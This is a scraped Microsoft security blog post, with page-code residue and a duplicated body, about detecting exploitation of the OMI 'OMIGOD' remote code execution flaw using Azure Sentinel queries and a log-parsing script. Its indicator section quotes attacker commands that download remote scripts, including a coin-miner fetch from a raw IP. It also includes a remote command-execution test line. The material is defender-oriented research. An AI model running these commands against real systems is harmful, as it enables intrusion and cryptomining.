38\n\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"VerifyUserEmailPage\",\"type\":\"USER\",\"urlPath\":\"/verifyemail/:userId/:verifyEmailToken\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"AllOccasionsPage\",\"type\":\"OCCASION\",\"urlPath\":\"/category/:categoryId/events/:boardId/all-events/(/:after|/:before)?\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"EventBoardPage\",\"type\":\"EVENT\",\"urlPath\":\"/category/:categoryId/events/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResou\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbReplyPage\",\"type\":\"TKB_REPLY\",\"urlPath\":\"/kb/:boardId/:messageSubject/:messageId/comments/:replyId\",\"__typename\":\"PageDescriptor\"}\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaBoardPage\",\"type\":\"IDEA\",\"urlPath\":\"/category/:categoryId/ideas/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CommunityGuideLinesPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/communityguidelines\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CaseCreatePage\",\"type\":\"SALESFORCE_CASE_CREATION\",\"urlPath\":\"/caseportal/create\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"Pa\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TkbEditPage\",\"type\":\"TKB\",\"urlPath\":\"/kb/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageRes\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\
"ForgotPasswordPage\",\"type\":\"USER\",\"urlPath\":\"/forgotpassword\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"IdeaEditPage\",\"type\":\"IDEA\",\"urlPath\":\"/idea/:boardId/:messageSubject/:messageId/edit\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageR\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"TagPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/tag/:tagName\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"BlogBoardPage\",\"type\":\"BLOG\",\"urlPath\":\"/category/:categoryId/blog/:boardId\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"OccasionMessagePage\",\"type\":\"OCCASION_TOPIC\",\"urlPath\":\"/event/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ManageContentPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/managecontent\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ClosedMembershipNodeNonMembersPage\",\"type\":\"GROUP_HUB\",\"urlPath\":\"/closedgroup/:groupHubId\",\"__typename\":\"PageDescriptor\"},\"__t\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"CommunityPage\",\"type\":\"COMMUNITY\",\"urlPath\":\"/\",\"__typename\":\"PageDescriptor\"},\"__typename\":\"PageResource\"},\r\n{\"lastUpdatedTime\":1775111737889,\"localOverride\":null,\"page\":\r\n{\"id\":\"ForumMessagePage\",\"type\":\"FORUM_TOPIC\",\"urlPath\":\"/discussions/:boardId/:messageSubject/:messageId\",\"__typename\":\"PageDescriptor\"},\"\r\n{\"lastUpdatedTime\":1775111737889,\"local
\r\nRussell McDonald, Roberto Rodriguez, and Ajeet Prakash\r\nSpecial thanks to: Ross Bevington\r\nFollowing the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)\r\nin the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)\r\nhave been monitoring for signs of exploitation and investigating detections to further protect customers. Following the\r\nMSRC guidance to block ports that you aren't using and ensuring the OMI service is patched are great first steps. 
In this\r\nblog, we share details about current attacks in the wild, the agents and software involved, indicators for defenders\r\nto look for on host machines, and new detections in Azure Sentinel.\r\nAttacks in the wild\r\nAt Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,\r\nand improve the detection coverage of our security offerings. As part of that work, MSTIC is monitoring for exploitation\r\nof the OMI-related RCE (CVE-2021-38647). To date we have seen several active exploitation attempts, ranging from basic\r\nhost enumeration (running uname, id, ps commands) to attempts to install a cryptocurrency miner or file share (details\r\nare available below in the Hunting cues section). We have also seen others in the community report similar behavior, including\r\ninstalls of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270.\r\nDue to the number of easily adaptable proof-of-concept exploits available and the volume of reconnaissance-type attacks, we\r\nare anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).\r\nWhat is OMI?\r\nOMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is\r\nalso designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a\r\nmuch more viable CIM Object Manager for embedded systems and other infrastructure components that have memory\r\nconstraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most\r\nUNIX® systems and Linux. 
In addition to OMI's small footprint, it also demonstrates very high performance.\r\nUnauthenticated remote command execution?\r\nIn a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can\r\nexecute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401\r\nunauthorized response. However, the user is able to execute commands with root privileges.\r\nMore details are available in the MSRC CVE-2021-38647 post and in the blog post from Wiz, the company that found the vulnerability.\r\nEndpoint Execution Context\r\nIn addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to\r\nexplore at the endpoint level.\r\nSCXCore Providers\r\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\r\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\r\nThe SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux\r\nsystem. 
There are several providers or classes available through the SCXcore provider which can be used to gather\r\ninformation from an endpoint such as MemoryStatisticalInformation or FileSystemStatisticalInformation.\r\nIn addition, there is one support provider named the RunAsProvider which provides the following classes:\r\nExecuteCommand: Executes any UNIX/Linux native command\r\nExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell\r\nExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell\r\nExecuting Code via ExecuteShellCommand\r\nBased on the initial research from Wiz, the following command was used to explore network traffic in order to craft an\r\nHTTP request to test the vulnerability:\r\n/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command 'id' timeout 0 }\r\nDuring testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify\r\nadditional sources of data. 
The following command was used:\r\n/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose\r\nAfter running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the\r\nRunAsProvider :: Invoke_ExecuteShellCommand class:\r\nChecking logs from auditd via Syslog, we also identified where the code was being executed from:\r\nWe tested the same in our lab environments, and we observed the same behavior which is shown below:\r\nLooking at the code behind the components of the RunAs providers, there are some references to it:\r\nMore information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider\r\nfor Operations Manager\r\nExecuting Code via ExecuteScript\r\nSimilarly, scripts can be run using the ExecuteScript provider. In this case, the body of the HTTP request contains a reference\r\nto ExecuteScript. In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:\r\nIn this case, the script is passed into a temp directory which you can see in the execve logs. Look for a command line similar\r\nto /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same\r\n/var/opt/microsoft/scx/tmp current working directory.\r\nOf note, this is the method we have seen used by attackers attempting to install coin miners.\r\nAzure Sentinel coverage\r\nRelevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel\r\nhas made it easy to collect the data from multiple data sources. 
This section of the post contains guidance and generic\r\napproaches to look for the OMI-related activity in various data feeds that are available by default in Azure Sentinel or can be\r\nonboarded to Azure Sentinel.\r\nSome Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.\r\nWhere these ports are open, attackers can exploit the vulnerability in OMI by sending a specially crafted message via\r\nHTTPS to the port on which OMI is listening to gain initial access to the machine.\r\nThe Azure Sentinel query linked below tries to identify connection attempts from external IP addresses to the OMI\r\nmanagement ports (5985, 5986, 1270). The query primarily leverages the Network Session normalization schema\r\n(imNetworkSession) as well as a few other logs to look for this network connection activity from an external IP address.\r\nWhere available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the\r\nquery has been shipped as a hunting query.\r\nNormalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be\r\ndeployed in a click using an ARM Template.\r\nCustomers can also use Heartbeat logs, which monitor agent health, to find vulnerable machines. The Azure Sentinel query\r\nlinked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are\r\nnot updated to the latest version that prevents this vulnerability.\r\n[updated Sept 27, 2021]\r\nAdditionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an\r\nAzure Environment with OMI installed. 
With the continuous export feature of Security Center, these security\r\nrecommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data, populated in the Security Nested\r\nRecommendations table, to build a detection query to show vulnerable machines.\r\nAzure Service Health has also sent notifications to potentially impacted customers. In impacted environments,\r\ncustomers can run a quick query to check whether they are impacted by this vulnerability.\r\nAzureActivity\r\n| where CategoryValue == 'ServiceHealth'\r\n| where isnotempty(Properties) and Properties has 'CVE-2021-38645'\r\n| extend defaultLanguageTitle = tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)\r\n[updated Sept 24, 2021]\r\nThe below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure\r\nSentinel Syslog data connector to explore the use of SCX Execute RunAs providers.\r\nExecute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux\r\ncommand and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and,\r\ndepending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider\r\nis used, then the script file is created in the directory /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx\r\n(e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of\r\nproducts including Microsoft Operations Manager, 
Microsoft Azure, and Microsoft Operations Management Suite.\r\nHunting cues and IOCs\r\nCommon enumeration commands seen: uname -a, id, netstat, ps\r\nExploitation attempt: wget hxxps://www.dwservice.net/download/dwagent_generic.sh -O dwagent_generic.sh\r\nExploitation attempt: echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh --output dw.sh \u003e go.sh\r\nExploitation attempt: curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh\r\nReferences:\r\nMSRC communications:\r\nCVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution\r\nVulnerability\r\nAdditional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security\r\nResponse 
Center\r\nAzure Security Center Guidance:\r\nUsing ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech\r\nCommunity\r\nSentinel Detections:\r\nAzure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24,\r\n2021]\r\nSoftware and tools:\r\nGitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager\r\nGitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)\r\nAzure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go\r\n(github.com)\r\nPublic Discussion About Attacks in the wild:\r\nchris doman on Twitter: \":loudspeaker:OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:\r\nWe took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI\r\nis installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\" / Twitter\r\nAndrew Morris on Twitter: \"The Azure \"OHMIGOD\" vulnerability (CVE-2021-38647) is increasing a good bit.\r\n~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN\r\nusers and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\" / Twitter\r\nKevin Beaumont on Twitter: \"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. 
Given\r\nMirai can enter networks and spread laterally via multiple vulns, this might be problematic.\r\nhttps://t.co/8nXSEcMHYa\\\" / Twitter\r\n\\n\r\n\\n\",\"body@stringLength\":\"24902\",\"rawBody\":\"\r\nRussell McDonald, Roberto Rodriguez, and Ajeet Prakash\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 14 of 38\n\n\\n\r\nSpecial thanks to: Ross Bevington \r\n\\n\\n\r\nFollowing the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)\r\nin the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)\r\nhave been monitoring for signs of exploitation and investigating detections to further protect customers. Following the\r\nMSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this\r\nblog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders\r\nto look for on host machines, and to share new detections in Azure Sentinel.\r\n\\n\\n\r\nAttacks in the wild\r\n\\n\r\nAt Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,\r\nand to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation\r\nof the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic\r\nhost enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details\r\navailable below in Hunting cues section). We have also seen others in the community report similar behavior to include\r\ninstalls of the Mirai botnet. 
While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. \r\nDue to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we\r\nare anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).\r\n\\n\\n\r\nWhat is OMI?\r\n\\n\r\nOMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is\r\nalso designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a\r\nmuch more viable CIM Object Manager for embedded systems and other infrastructure components that have memory\r\nconstraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most\r\nUNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.\r\n\\n\\n\r\nUnauthenticated remote command execution?\r\n\\n\r\nIn a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can\r\nexecute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401\r\nunauthorized response. 
However, the user is able to execute commands with root privileges.\r\nMore details are available in the MSRC CVE-2021-38647 post and in the blog post from Wiz, the company that found the vulnerability.\r\n\r\nEndpoint Execution Context\r\nIn addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to\r\nexplore at the endpoint level.\r\n\r\nSCXCore Providers\r\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\r\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\r\nThe SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux\r\nsystem. There are several providers or classes available through the SCXcore provider which can be used to gather\r\ninformation from an endpoint, such as MemoryStatisticalInformation or FileSystemStatisticalInformation.\r\n\r\nIn addition, there is one support provider named the RunAsProvider which provides the following classes:\r\nExecuteCommand: Executes any UNIX/Linux native command\r\nExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell\r\nExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell\r\n\r\nExecuting Code via ExecuteShellCommand\r\nBased on the initial research from Wiz, the following command was used to explore network traffic in order to craft an\r\nHTTP request to test the vulnerability:\r\n/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command 'id' timeout 0 }\r\n\r\nDuring testing, we used the Scxadmin tool, available as part of SCX, to increase 
all logging to VERBOSE and identify\r\nadditional sources of data. The following command was used:\r\n/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose\r\n\r\nAfter running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the\r\nRunAsProvider :: Invoke_ExecuteShellCommand class:\r\nChecking logs from auditd via Syslog, we also identified where the code was being executed from:\r\n\r\nWe tested the same in our lab environments, and we observed the same behavior, which is shown below:\r\n\r\nLooking at the code behind the components of the RunAs providers, there are some references to it:\r\n\r\nMore information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider\r\nfor Operations Manager\r\n\r\nExecuting Code via ExecuteScript\r\nSimilarly, scripts can be run using the ExecuteScript provider. In this case, the body of the HTTP request contains a reference\r\nto ExecuteScript. In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:\r\n\r\nIn this case, the script is passed into a temp directory, which you can see in the execve logs. Look for a command line similar\r\nto /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same\r\n/var/opt/microsoft/scx/tmp current working directory.\r\nOf note, this is the method we have seen used by attackers attempting to install coin miners.\r\n\r\nAzure Sentinel coverage\r\nRelevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel\r\nhas made it easy to collect the data from multiple data sources. 
This section of the post contains guidance and generic\r\napproaches to look for OMI-related activity in various data feeds that are available by default in Azure Sentinel or can be\r\nonboarded to Azure Sentinel.\r\n\r\nSome Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.\r\nWhere these ports are open, attackers can exploit the vulnerability in OMI by sending a specially crafted message via\r\nHTTPS to the port on which OMI is listening to gain initial access to the machine.\r\n\r\nThe Azure Sentinel query linked below tries to identify connection attempts from external IP addresses to the OMI\r\nmanagement ports (5985, 5986, 1270). The query primarily leverages the Network Session normalization schema\r\n(imNetworkSession) as well as a few other logs to look for this network connection activity from an external IP address.\r\nWhere available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the\r\nquery has been shipped as a hunting query.\r\nNormalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be\r\ndeployed in a click using an ARM Template.\r\n\r\nCustomers can also use Heartbeat logs, which monitor agent health, to find vulnerable machines. The Azure Sentinel query\r\nlinked below tries to leverage Heartbeat data to find OMS agents that are reporting to the Azure Sentinel workspace but are\r\nnot updated to the latest version that prevents this vulnerability.\r\n[updated Sept 27, 2021]\r\n\r\nAdditionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an\r\nAzure Environment with OMI installed. With the continuous export feature of Security Center, these security\r\nrecommendations can be imported into Azure Sentinel. 
Azure Sentinel leverages the data populated in the Security Nested\r\nRecommendations table to build a detection query to show vulnerable machines.\r\n\r\nAzure Service Health has also sent notifications to potentially impacted customers. In impacted environments,\r\ncustomers can run a quick query to check whether they are affected by this vulnerability.\r\n\r\nAzureActivity\r\n| where CategoryValue == 'ServiceHealth'\r\n| where isnotempty(Properties) and Properties has 'CVE-2021-38645'\r\n| extend defaultLanguageTitle = tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)\r\n\r\nSCX RunAs Provider\r\n[updated Sept 24, 2021]\r\nThe below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure\r\nSentinel Syslog data connector to explore the use of SCX Execute RunAs providers.\r\n\r\nExecute RunAs providers such as ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux\r\ncommand and script, respectively, using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and,\r\ndepending on the RunAs provider used, what is executed can be a command or a script. If the ExecuteScript RunAs provider\r\nis used, then the script file is created in the directory /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx\r\n(e.g. scxzOy96) and is run with /bin/sh. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of\r\nproducts including Microsoft Operations Manager, 
Microsoft Azure, and Microsoft Operations Management Suite.\r\n\r\nHunting cues and IOCs\r\nCommon enumeration commands seen: uname -a, id, netstat, ps\r\nExploitation attempt: wget hxxps://www.dwservice.net/download/dwagent_generic.sh  -O dwagent_generic.sh\r\nExploitation attempt: echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh  --output dw.sh > go.sh\r\nExploitation attempt: curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh\r\n\r\nReferences:\r\nMSRC communications:\r\nCVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution Vulnerability\r\nAdditional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security Response Center\r\nAzure Security Center Guidance:\r\nUsing ASC to find machines affected by OMI 
vulnerabilities in Azure VM Management Extensions - Microsoft Tech Community\r\nSentinel Detections:\r\nAzure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub\r\nAzure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24, 2021]\r\nSoftware and tools:\r\nGitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager\r\nGitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)\r\nResearch lab environments:\r\nAzure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)\r\nPublic Discussion About Attacks in the wild:\r\nchris doman on Twitter: \"OMIGOD (CVE-2021-38647) is now under active exploitation We took at a look at one of\r\nthe first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI is installed\r\nhttps://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\" / Twitter\r\nAndrew Morris on Twitter: \"The Azure \"OHMIGOD\" vulnerability (CVE-2021-38647) is increasing a good bit.\r\n~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN\r\nusers and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\" / Twitter\r\nKevin Beaumont on Twitter: \"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. 
Given\r\nMirai can enter networks and spread laterally via multiple vulns, this might be problematic.\r\nhttps://t.co/8nXSEcMHYa\" / Twitter\r\n
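The endpoint cues described above (execution from the /var/opt/microsoft/scx/tmp working directory, and /bin/sh running a script under /etc/opt/microsoft/scx/conf/tmpdir/scx*) can be checked directly against auditd records. This is an added example, not code from the original post or from the Azure Sentinel repository; it assumes raw auditd EXECVE/CWD lines rather than the AUOMS Syslog format the hunting query reads, and its function names, the "ExecuteCommand or child process" bucket and the sample records are constructed for illustration.

```python
import re

# Paths taken from the post's description of the SCX RunAs providers.
SCX_CWD = "/var/opt/microsoft/scx/tmp"
SCX_SCRIPT_PREFIX = "/etc/opt/microsoft/scx/conf/tmpdir/scx"
# Command names taken from the post's "Hunting cues and IOCs" table.
ENUM_CMDS = {"uname", "id", "netstat", "ps"}
DOWNLOADERS = {"wget", "curl"}

_HEADER = re.compile(r"^type=(\w+) msg=audit\(([\d.]+:\d+)\):\s*(.*)$")
_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def _decode(value):
    """auditd quotes plain strings and hex-encodes values with spaces or control bytes."""
    if value.startswith('"'):
        return value.strip('"')
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value


def parse_events(lines):
    """Correlate EXECVE and CWD records that share an audit event id."""
    events = {}
    for line in lines:
        m = _HEADER.match(line.strip())
        if not m:
            continue
        rtype, event_id, body = m.groups()
        fields = dict(_FIELD.findall(body))
        ev = events.setdefault(event_id, {"id": event_id, "cwd": None, "argv": []})
        if rtype == "CWD" and "cwd" in fields:
            ev["cwd"] = _decode(fields["cwd"])
        elif rtype == "EXECVE":
            argc = int(fields.get("argc", "0"))
            # Very long arguments are split by auditd as aN[i]= and are skipped here.
            ev["argv"] = [_decode(fields[f"a{i}"]) for i in range(argc) if f"a{i}" in fields]
    return list(events.values())


def classify(event):
    """Return a finding for executions from the SCX working directory, else None."""
    argv, cwd = event["argv"], event["cwd"]
    if cwd != SCX_CWD or not argv:
        return None
    shell = argv[0] in ("/bin/sh", "sh")
    if shell and len(argv) >= 2 and argv[1].startswith(SCX_SCRIPT_PREFIX):
        provider, command = "ExecuteScript", argv[1]
    elif shell and len(argv) >= 3 and argv[1] == "-c":
        provider, command = "ExecuteShellCommand", argv[2]
    else:
        # Assumption: a direct exec from this directory is ExecuteCommand
        # or a child of one of the shells above.
        provider, command = "ExecuteCommand or child process", " ".join(argv)
    names = {word.rsplit("/", 1)[-1] for word in command.split()}
    if provider == "ExecuteScript":
        cue = "script"  # contents must be recovered from the file or the request body
    elif names & DOWNLOADERS:
        cue = "download"
    elif names & ENUM_CMDS:
        cue = "enumeration"
    else:
        cue = "other"
    return {"id": event["id"], "provider": provider, "command": command, "cue": cue}


def hunt(lines):
    """Parse auditd lines and return findings in the order the events were seen."""
    return [hit for hit in map(classify, parse_events(lines)) if hit]


def _hex(text):
    return text.encode().hex().upper()


# Constructed sample records (not from a real host); example.invalid is a placeholder.
SAMPLE_AUDIT_LINES = [
    'type=EXECVE msg=audit(1631900000.101:501): argc=3 a0="/bin/sh" a1="-c" a2="id"',
    'type=CWD msg=audit(1631900000.101:501): cwd="/var/opt/microsoft/scx/tmp"',
    'type=EXECVE msg=audit(1631900003.412:502): argc=3 a0="/bin/sh" a1="-c" a2=' + _hex("uname -a"),
    'type=CWD msg=audit(1631900003.412:502): cwd="/var/opt/microsoft/scx/tmp"',
    'type=EXECVE msg=audit(1631900009.007:503): argc=2 a0="/bin/sh" '
    'a1="/etc/opt/microsoft/scx/conf/tmpdir/scxzOy96"',
    'type=CWD msg=audit(1631900009.007:503): cwd="/var/opt/microsoft/scx/tmp"',
    'type=EXECVE msg=audit(1631900015.250:504): argc=3 a0="/bin/sh" a1="-c" a2='
    + _hex("wget http://example.invalid/a.sh -O a.sh"),
    'type=CWD msg=audit(1631900015.250:504): cwd="/var/opt/microsoft/scx/tmp"',
    'type=EXECVE msg=audit(1631900020.900:505): argc=2 a0="ls" a1="-la"',
    'type=CWD msg=audit(1631900020.900:505): cwd="/home/azureuser"',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_AUDIT_LINES):
        print(hit)
```

Matching on the working directory alone also catches child processes of the shell, so treat the third bucket as a lead to correlate with the parent process rather than as proof of ExecuteCommand.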
0.1)\",\"controllerIconColor\":\"var(--lia-bs-body-color)\",\"controllerIconHoverColor\":\"var(--lia-bs-body-color)\",\"controllerTextColor\":\"var(--lia-nav-controller-icon-color)\",\"controllerTextHoverColor\":\"var(--lia-nav-controller-icon-hover-color)\",\"controllerHighlightColor\":\"hsla(30, 